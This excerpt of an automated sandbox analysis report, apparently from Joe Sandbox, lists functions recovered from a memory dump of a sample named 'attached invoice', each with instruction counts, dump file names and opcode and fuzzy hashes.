                                                                                                    • Instruction Fuzzy Hash: B9412A716462466BCB25FF6CD881F6A3B65EB54B08F41042DEF0DAB289D7B19C81C790
                                                                                                    Function 019AA553 Relevance: .1, Instructions: 139COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
                                                                                                    • Instruction ID: 4684163cda5c41c7d73100fd3996af191cd0f22dc12224ebfc562b08c6b4f0fd
                                                                                                    • Opcode Fuzzy Hash: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
                                                                                                    • Instruction Fuzzy Hash: 09411A71A007169FD725CF28C884A6EB7A9FFC4315B44852DE95A87240EB30ED1CCBD5
                                                                                                    Function 01910118 Relevance: .1, Instructions: 138COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b0193cf942ed6563c0864a43d3b7f6ddf9100d4ae358a419068fd4f5920eda03
                                                                                                    • Instruction ID: af7800d7844d7f12ab95eae5d2565446e7b3b3c8098d1d9cc37a535ef2bc518c
                                                                                                    • Opcode Fuzzy Hash: b0193cf942ed6563c0864a43d3b7f6ddf9100d4ae358a419068fd4f5920eda03
                                                                                                    • Instruction Fuzzy Hash: 8141CE35D012199BDB14DF98C440AEEBBB4BF88700F18465AF819F7258D7329DC1CBA4
                                                                                                    Function 0190EB1C Relevance: .1, Instructions: 138COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f0136fc170e1542be6f4fa7d4343f8889f856864f72e3df30b795a14a1e03079
                                                                                                    • Instruction ID: ee4f906d5883518a6a6e50e9dd623aeb891bf87c58bc871586c629ae718b10f5
                                                                                                    • Opcode Fuzzy Hash: f0136fc170e1542be6f4fa7d4343f8889f856864f72e3df30b795a14a1e03079
                                                                                                    • Instruction Fuzzy Hash: 3941D0726047028FD726DF2DC880A27B7E9EF98314F004D6EE94BC7251DB30E8448B61
                                                                                                    Function 01922670 Relevance: .1, Instructions: 137COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                                                                    • Instruction ID: 4b768a76ddc674722b5706e9ed988696e67728a36b64d1887078a28859b20009
                                                                                                    • Opcode Fuzzy Hash: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                                                                    • Instruction Fuzzy Hash: AB517B75A00229CFCB55CF99C480AAEF7F5FF88750F2882A9D819A7351D730AE41CB94
                                                                                                    Function 018E6074 Relevance: .1, Instructions: 133COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f972b2f76754752d2623647cd272662e3aa2a622191f5fef1be41a8920ed5f6b
                                                                                                    • Instruction ID: 36a72564b0d57ac7b53cc22ebedcf95d3584d00960cfceae6bb7e0d02457c3d4
                                                                                                    • Opcode Fuzzy Hash: f972b2f76754752d2623647cd272662e3aa2a622191f5fef1be41a8920ed5f6b
                                                                                                    • Instruction Fuzzy Hash: F951D670940616DBDB26DB28CC09BE9BBF5FF22314F2482A9D219D72D1E7749A81CF41
                                                                                                    Function 018E0AED Relevance: .1, Instructions: 130COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 09f2ea833838feb48aeec5bc8c8da005d0e075140b36aeed7c0fe3f34cf347c9
                                                                                                    • Instruction ID: 5ca689f19352f207ccf53d6355a87e79c404a2921103fd4f572d6583e008407d
                                                                                                    • Opcode Fuzzy Hash: 09f2ea833838feb48aeec5bc8c8da005d0e075140b36aeed7c0fe3f34cf347c9
                                                                                                    • Instruction Fuzzy Hash: 51419335A002299BDF22DF28C884BEA77B8FF85740F0104A9E949EB241D774DE81CB91
                                                                                                    Function 019A81EE Relevance: .1, Instructions: 129COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                    • Instruction ID: 969e86979148663b3a80ba5e37659238e18c1d2a43900f52b68b4aa182f76987
                                                                                                    • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                    • Instruction Fuzzy Hash: 0241F871B00205ABDF15DF99C880ABFBBBEEF88641F544069E909A7341EA70DE09C7D0
                                                                                                    Function 018E07A7 Relevance: .1, Instructions: 128COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3006d2cd18fb344e4dc1fe977f2999d98b2c151fecf7b646b83593210268d064
                                                                                                    • Instruction ID: afef415b928a429e3abe546e4462ac082a6473d09115769e2de03dfc15bfac1d
                                                                                                    • Opcode Fuzzy Hash: 3006d2cd18fb344e4dc1fe977f2999d98b2c151fecf7b646b83593210268d064
                                                                                                    • Instruction Fuzzy Hash: C041CF717007169FD324CF28C884A22B7F9FF4A314B144A6EE55AC7A11E7B0EA55CB90
                                                                                                    Function 0190A390 Relevance: .1, Instructions: 127COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2f7044e5d9897c316905739bbfa23055d0671e03f35a505a7bf5092ffab35a15
                                                                                                    • Instruction ID: 98a676d1527ad4126904b41b26214b3d199a999a323ea9d153926409b9748518
                                                                                                    • Opcode Fuzzy Hash: 2f7044e5d9897c316905739bbfa23055d0671e03f35a505a7bf5092ffab35a15
                                                                                                    • Instruction Fuzzy Hash: BF41DD35909305CFDB22DFADD898BAD7BB4FB28720F050599D409AB2E4DB749940CBE0
                                                                                                    Function 018E8B10 Relevance: .1, Instructions: 124COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1bdc2fe8c9ba5b145c1b630fc5462204ddcf0ffbc326b62ed8f12217dd6b4151
                                                                                                    • Instruction ID: d8ec626d1ee6f18fd291cdf515efa84cdfda8421d74b8e217e8222239f4b1794
                                                                                                    • Opcode Fuzzy Hash: 1bdc2fe8c9ba5b145c1b630fc5462204ddcf0ffbc326b62ed8f12217dd6b4151
                                                                                                    • Instruction Fuzzy Hash: 2241F271A05206CFCB249F9CD888A5E7BF6FB86704F14846AE501DB665C375DA42CF90
                                                                                                    Function 018D88C8 Relevance: .1, Instructions: 123COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a9fa22f54c846fbacfc31102b28503943e24cac08514f742e55bd0e68edb5baa
                                                                                                    • Instruction ID: aea324b9777cf1fad412b5c621e01d673113b8e8924e042c4196896e39fd3c7a
                                                                                                    • Opcode Fuzzy Hash: a9fa22f54c846fbacfc31102b28503943e24cac08514f742e55bd0e68edb5baa
                                                                                                    • Instruction Fuzzy Hash: B0417D71508306AED312DF68C840A6BB7E9FF84B54F01092EFA99D7150E730DE558B93
                                                                                                    Function 018E08CD Relevance: .1, Instructions: 122COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6c5312f1224c42ac477db2526b3639cf56460d1aa3aa55d4cd063b56df0e0578
                                                                                                    • Instruction ID: ec19957a2551830c71d95d55c8b84d341decf8d116ac2e84d03e60318bf7712d
                                                                                                    • Opcode Fuzzy Hash: 6c5312f1224c42ac477db2526b3639cf56460d1aa3aa55d4cd063b56df0e0578
                                                                                                    • Instruction Fuzzy Hash: BD417B71604705EFE721EF18C884B2ABBE4FF55314F24896AF549CB251E7B0EA42CB91
                                                                                                    Function 01910630 Relevance: .1, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                                                                    • Instruction ID: 0891cec100e382d74e67903841242630de586e983dc84a60817d367aa6b373c0
                                                                                                    • Opcode Fuzzy Hash: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                                                                    • Instruction Fuzzy Hash: 31416171A00709EFDB24DF98C980A5AB7F8FF48740B24496DE55AE7254D731EA84CF50
                                                                                                    Function 018E254C Relevance: .1, Instructions: 119COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 79814e12d7921d693a6840bba92545a419d93b4f3f7d0b027ce8266a1013f66f
                                                                                                    • Instruction ID: 87e6f874f7178df3a49f1be53f2310c452f71dd4f1746db4249ae1f40e01d924
                                                                                                    • Opcode Fuzzy Hash: 79814e12d7921d693a6840bba92545a419d93b4f3f7d0b027ce8266a1013f66f
                                                                                                    • Instruction Fuzzy Hash: 0A41D0B1901705CFC765DF28C954A59B7FAFF96314F10869ED50ACB2A1DB30AA81CF42
                                                                                                    Function 0191C819 Relevance: .1, Instructions: 116COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 73ab78bde97bc35617b933e30acda0c47484beebe62bc2ac4928a3e0f9ea984c
                                                                                                    • Instruction ID: c101d15236801946629d3ee733dba0b32b88b869da1b74baddf47ee85729b32f
                                                                                                    • Opcode Fuzzy Hash: 73ab78bde97bc35617b933e30acda0c47484beebe62bc2ac4928a3e0f9ea984c
                                                                                                    • Instruction Fuzzy Hash: 8F319CB1A40709DFDB12CFA8C140799BBF4FB48724F2084AED509EB251D332DA42CB90
                                                                                                    Function 01960443 Relevance: .1, Instructions: 114COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 20a85a97f45c89a9513d7c93bb82282d44db76fc65cc67f69a144d87b3fcf95f
                                                                                                    • Instruction ID: 014726712236f72db69d8bf919618318fbf8fcedfd663af7f2905e1f30bb568f
                                                                                                    • Opcode Fuzzy Hash: 20a85a97f45c89a9513d7c93bb82282d44db76fc65cc67f69a144d87b3fcf95f
                                                                                                    • Instruction Fuzzy Hash: 95415E715083119BD720DF29C884B9BBBE8FB88754F004A2EF59CD7251E7749945CBA2
                                                                                                    Function 019B29CF Relevance: .1, Instructions: 112COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 964b431755c31cf60f3e7e272b63c36df6a51c7b6807d6792e3bb1ab7187f77e
                                                                                                    • Instruction ID: f275e0fa1ad16076fb09f6b68305dbb1fb3abf106f4c4b48021289bf0d15a825
                                                                                                    • Opcode Fuzzy Hash: 964b431755c31cf60f3e7e272b63c36df6a51c7b6807d6792e3bb1ab7187f77e
                                                                                                    • Instruction Fuzzy Hash: 65414372A00109EFDB15CF98C9C0A9EBBB5FF94754F244069E919AB341D730EA41CB90
                                                                                                    Function 01960227 Relevance: .1, Instructions: 111COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a1d113bf73b1e55251c03c83c601332d62cdac59f812125d3571eb4c032b64a6
                                                                                                    • Instruction ID: 752ddf595cb1e639c922c46c10a2882e7e39db26c251f04b77ef36294d4a34c4
                                                                                                    • Opcode Fuzzy Hash: a1d113bf73b1e55251c03c83c601332d62cdac59f812125d3571eb4c032b64a6
                                                                                                    • Instruction Fuzzy Hash: 1541AC326046429FD320DF68D880E6AB7ADFF88741F080A2DF959C7690E730E914C7A6
                                                                                                    Function 018E4779 Relevance: .1, Instructions: 111COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a7ad36d2678ef766beef85d876cc1fd5ebeee97a56c783a4a970d8e65221828b
                                                                                                    • Instruction ID: 5b50bd8a85380a4efd5e4b1d484a6a38b7cc2ce159351b626ff23d09ff43b2e2
                                                                                                    • Opcode Fuzzy Hash: a7ad36d2678ef766beef85d876cc1fd5ebeee97a56c783a4a970d8e65221828b
                                                                                                    • Instruction Fuzzy Hash: F74115706043528FD725DF2CD898B2ABBEAFF82354F14452DEA49C72A1DB30DA41CB91
                                                                                                    Function 018F01F1 Relevance: .1, Instructions: 106COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 60217219fab30d7d5fc2cb2f90293db42116593f581b72c7076c745c3ea74110
                                                                                                    • Instruction ID: 3468bb49dfd829696467555240a87e37e1d514e689651ef5607b7dfb3d620b88
                                                                                                    • Opcode Fuzzy Hash: 60217219fab30d7d5fc2cb2f90293db42116593f581b72c7076c745c3ea74110
                                                                                                    • Instruction Fuzzy Hash: 27316A35600244AFDF128BACCC44B9ABFEAEF00350F04456AF959D7353C6749A44CB65
                                                                                                    Function 018DEDFA Relevance: .1, Instructions: 104COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 25da258b1c36866bfca6858e405e3f64542c004aafc91f67780a0695d7daa8dd
                                                                                                    • Instruction ID: 3fae5b696e120647d5a8e6b5ff36a686762843142c12e59526812c3725eebfbe
                                                                                                    • Opcode Fuzzy Hash: 25da258b1c36866bfca6858e405e3f64542c004aafc91f67780a0695d7daa8dd
                                                                                                    • Instruction Fuzzy Hash: A841F271A047898FDB25CBACC4107AEBBF2AF96304F14496ED18AEB241C7306A04CB59
                                                                                                    Function 018E4180 Relevance: .1, Instructions: 102COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 803175c8f0ab436d0dd4cb0109b11e8e95cd1566803ba3c1a13a2b6a0804c38c
                                                                                                    • Instruction ID: e25b8d6a0bf9db7481087d33e528c57599916da12e95a7406ac7292a332dfec6
                                                                                                    • Opcode Fuzzy Hash: 803175c8f0ab436d0dd4cb0109b11e8e95cd1566803ba3c1a13a2b6a0804c38c
                                                                                                    • Instruction Fuzzy Hash: 3F41AB31205B459FD726CF28C894FD6BBE8AF59714F058829EA5ECB250D774E904CB90
                                                                                                    Function 019066E0 Relevance: .1, Instructions: 102COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                                                                                                    • Instruction ID: 3cb524dbedf208c8a75fecd6306fb34394d9dbc0b23746428569a375556c3ba0
                                                                                                    • Opcode Fuzzy Hash: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                                                                                                    • Instruction Fuzzy Hash: 7A41C272201A46DFD732DF18C984FAA7BA5FB84B11F004578E54D8B6A0DB31EE01DB90
                                                                                                    Function 01980980 Relevance: .1, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1ea4bc05c1ee0cdf447a732131759216915923e3de71bbe8f1ea3a420c86af98
                                                                                                    • Instruction ID: 0d77c7c289d7e12a7a8242a4bbc22df81eb8d6c41be46888895c3bc41a49f2af
                                                                                                    • Opcode Fuzzy Hash: 1ea4bc05c1ee0cdf447a732131759216915923e3de71bbe8f1ea3a420c86af98
                                                                                                    • Instruction Fuzzy Hash: BB310B32505345AFD316EF18C805E6BBBECEF94660F08462DF99987251E730DD08CBA1
                                                                                                    Function 0195E79D Relevance: .1, Instructions: 100COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 27abddd06571ad91ea75ca907fac6e7c1e423848949be1fe9156127552ab8892
                                                                                                    • Instruction ID: e921cc7617d30ba37318fe5548bb2c09ff2c7f6f4b1b8146c42686125103bedb
                                                                                                    • Opcode Fuzzy Hash: 27abddd06571ad91ea75ca907fac6e7c1e423848949be1fe9156127552ab8892
                                                                                                    • Instruction Fuzzy Hash: 1831A171A416819BF326DB5DC948B25BB9CBF41B45F1D04F4AF0CAB6D1DB2ADA40C322
                                                                                                    Function 019843BA Relevance: .1, Instructions: 96COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c9b88b3ccbc5a451f86d7500646c7a309c0734c4dc1d8de4263f3a0f505a4a2e
                                                                                                    • Instruction ID: b3bd5a832c21d62df51ad1f1a50585f064d8e20ae2ddd4dd851be5e6be02f3bf
                                                                                                    • Opcode Fuzzy Hash: c9b88b3ccbc5a451f86d7500646c7a309c0734c4dc1d8de4263f3a0f505a4a2e
                                                                                                    • Instruction Fuzzy Hash: 5E315676A4112DABCB21EF58DC88FDEBBF9AF98710F1400A5E50DA7250DA30DE418F90
                                                                                                    Function 0190EA40 Relevance: .1, Instructions: 96COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 40d7d26ed4c6d0df1d248ad3f0b49940eff5889a1a2c2b2d2a4cf22eb128088a
                                                                                                    • Instruction ID: 756ad9887b78c10f8d91d511adc6aea41d58d16f282cb0960b9c871f17418e58
                                                                                                    • Opcode Fuzzy Hash: 40d7d26ed4c6d0df1d248ad3f0b49940eff5889a1a2c2b2d2a4cf22eb128088a
                                                                                                    • Instruction Fuzzy Hash: B631A472E01215AFDB22DEADC840EAFBBF8FB48750F114865E959D7290D270DE408B91
                                                                                                    Function 018E06CF Relevance: .1, Instructions: 95COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5b7ba5943d55a2b353930f5424353295a0ed2a465b3e0bc0d9f31d057a7f0158
                                                                                                    • Instruction ID: 9f1b5ec2ecc05b78e39d8266dc512bfeffd3111d8d291eed66c8299fd5902cdb
                                                                                                    • Opcode Fuzzy Hash: 5b7ba5943d55a2b353930f5424353295a0ed2a465b3e0bc0d9f31d057a7f0158
                                                                                                    • Instruction Fuzzy Hash: 0F3102327447069BC722DE58CC84E6BBBE5ABC5350F024828FD05D7311EB71DE018BA2
                                                                                                    Function 018E8470 Relevance: .1, Instructions: 94COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0f16dd825ffb695ea54aede8f5bef84effa26087e84fb714a85104d32eb61d3a
                                                                                                    • Instruction ID: cdf8bd1f2d007947a90848b71b3b6af85eb2d02eea5a8fb40ccd3e63a9d41b7e
                                                                                                    • Opcode Fuzzy Hash: 0f16dd825ffb695ea54aede8f5bef84effa26087e84fb714a85104d32eb61d3a
                                                                                                    • Instruction Fuzzy Hash: 003169726053119FE320CF19C844B2BBBE9FB89B04F05496DEA88D7391D774E984CB91
                                                                                                    Function 0191A5E7 Relevance: .1, Instructions: 92COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
